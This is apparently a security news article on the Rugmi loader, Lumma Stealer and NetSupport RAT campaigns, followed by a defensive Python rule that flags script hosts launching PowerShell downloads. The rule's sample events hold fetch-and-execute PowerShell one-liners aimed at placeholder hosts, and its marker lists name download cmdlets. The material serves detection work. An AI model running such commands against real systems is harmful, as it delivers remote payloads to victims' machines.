A new malware loader is being used by threat actors to deliver a variety of information stealers such as Lumma Stealer (aka LummaC2), Vidar, RecordBreaker (aka Raccoon Stealer V2), and Rescoms.
Cybersecurity firm ESET is tracking the trojan under the name Win/TrojanDownloader.Rugmi.
"This malware is a loader with three types of components: a downloader that downloads an encrypted payload, a loader that runs the payload from internal resources, and another loader that runs the payload from an external file on the disk," the company said in its Threat Report H2 2023.
Telemetry data gathered by the company shows that detections for the Rugmi loader spiked in October and November 2023, surging from single-digit daily numbers to hundreds per day.
Stealer malware is typically sold under a malware-as-a-service (MaaS) model to other threat actors on a subscription basis. Lumma Stealer, for instance, is advertised in underground forums for $250 a month. The most expensive plan costs $20,000, but it also gives buyers access to the source code and the right to sell it.
There is evidence to suggest that the codebase associated with the Mars, Arkei, and Vidar stealers has been repurposed to create Lumma.
Besides constantly adapting its tactics to evade detection, the off-the-shelf tool is distributed through a variety of methods ranging from malvertising to fake browser updates to cracked installations of popular software such as VLC media player and OpenAI ChatGPT.
Another technique concerns the use of Discord's content delivery network (CDN) to host and propagate the malware, as revealed by Trend Micro in October 2023.
This involves leveraging a combination of random and compromised Discord accounts to send direct messages to potential targets, offering them $10 or a Discord Nitro subscription in exchange for their help on a project.
Users who agree to the offer are then urged to download an executable file hosted on Discord CDN that masquerades as iMagic Inventory but, in reality, contains the Lumma Stealer payload.
"Ready-made malware solutions contribute to the proliferation of malicious campaigns because they make the malware available even to potentially less technically skilled threat actors," ESET said.
"Offering a broader range of functions then serves to render Lumma Stealer even more attractive as a product."
The disclosures come as McAfee Labs disclosed a new variant of NetSupport RAT, which emerged from its original progenitor NetSupport Manager and has since been put to use by initial access brokers to gather information and perform additional actions on victims of interest.
"The infection begins with obfuscated JavaScript files, serving as the initial point of entry for the malware," McAfee said, adding that it highlights the "evolving tactics employed by cybercriminals."
The execution of the JavaScript file advances the attack chain by running PowerShell commands to retrieve the remote control and stealer malware from an actor-controlled server. The campaign's primary targets include the U.S. and Canada.
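The infection chain just described (a script host running PowerShell to fetch a remote payload) leaves a recognisable parent/child pattern in process-creation telemetry. The following is an added defensive example, not code from ESET's or McAfee's reports: a small triage rule in Python that scores Sysmon-style process-creation records. The field names and every sample event are constructed for this illustration, and the `.invalid` hostnames are placeholders.

```python
# Added example (not from the article or the vendors it cites): flag
# process-creation events where a Windows script host launches PowerShell
# with arguments that indicate a remote download. Field names loosely follow
# Sysmon Event ID 1 (parent_image, image, command_line) but are an assumption.

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}

# Substrings that indicate PowerShell is being used to retrieve remote content.
DOWNLOAD_MARKERS = (
    "downloadstring", "downloadfile", "invoke-webrequest",
    "invoke-restmethod", "net.webclient", "start-bitstransfer",
)
# Flags commonly paired with one-liner download stages
# ("-nop" also matches "-noprofile", "-enc" also matches "-encodedcommand").
STEALTH_MARKERS = ("-w hidden", "-windowstyle hidden", "-nop", "-enc")


def basename(path):
    """Lower-cased file name of a Windows path (accepts / or \\ separators)."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def score_event(event):
    """Return the reasons an event looks like the script-to-PowerShell download
    stage; an empty list means the event is not flagged."""
    if basename(event.get("image", "")) not in POWERSHELL:
        return []
    parent = basename(event.get("parent_image", ""))
    cmdline = event.get("command_line", "").lower()

    reasons = []
    if parent in SCRIPT_HOSTS:
        reasons.append("PowerShell launched by script host " + parent)
    found_download = [m for m in DOWNLOAD_MARKERS if m in cmdline]
    if found_download:
        reasons.append("remote download via " + ", ".join(found_download))
    found_stealth = [m for m in STEALTH_MARKERS if m in cmdline]
    if found_stealth:
        reasons.append("stealth flags " + ", ".join(found_stealth))

    # Require a download indicator plus either a script-host parent or a
    # stealth flag; a download on its own may be a legitimate admin script.
    if found_download and (parent in SCRIPT_HOSTS or found_stealth):
        return reasons
    return []


def triage(events):
    """Run score_event over a batch; return {event id: reasons} for hits only."""
    hits = {}
    for event in events:
        reasons = score_event(event)
        if reasons:
            hits[event["id"]] = reasons
    return hits


# Constructed sample telemetry: events 1 and 4 model the JS-to-PowerShell
# download stage; events 2 and 3 are benign PowerShell use.
SAMPLE_EVENTS = [
    {"id": 1, "parent_image": r"C:\Windows\System32\wscript.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell.exe -nop -w hidden -c \"IEX (New-Object "
                     "Net.WebClient).DownloadString('http://stage.example.invalid/a.txt')\""},
    {"id": 2, "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell.exe Get-ChildItem C:\\Users"},
    {"id": 3, "parent_image": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Program Files\PowerShell\7\pwsh.exe",
     "command_line": "pwsh.exe -File C:\\deploy\\fetch.ps1"},
    {"id": 4, "parent_image": r"C:\Windows\System32\cscript.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell.exe -c Invoke-WebRequest "
                     "http://updates.example.invalid/u.dat -OutFile C:\\Users\\Public\\u.dat"},
]

if __name__ == "__main__":
    for event_id, reasons in triage(SAMPLE_EVENTS).items():
        print("event", event_id, "->", "; ".join(reasons))
```

The rule deliberately requires two signals (a download indicator together with a script-host parent or a hidden/encoded flag) so that routine administrative PowerShell is not flagged; in a real deployment the marker lists would be tuned against the environment's own baseline, and a hit on the script-host path is a good pivot point for pulling the originating JavaScript file for analysis.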